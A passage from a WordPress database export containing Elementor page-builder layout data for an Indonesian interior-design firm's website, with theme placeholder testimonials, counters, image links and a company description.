fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3657,4843,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3658,4843,'_elementor_pro_version','3.8.1'),(3659,4844,'_wp_page_template','elementor_header_footer'),(3660,4844,'_elementor_edit_mode','builder'),(3661,4844,'_elementor_template_type','wp-page'),(3662,4844,'_elementor_version','3.8.1'),(3663,4844,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_bor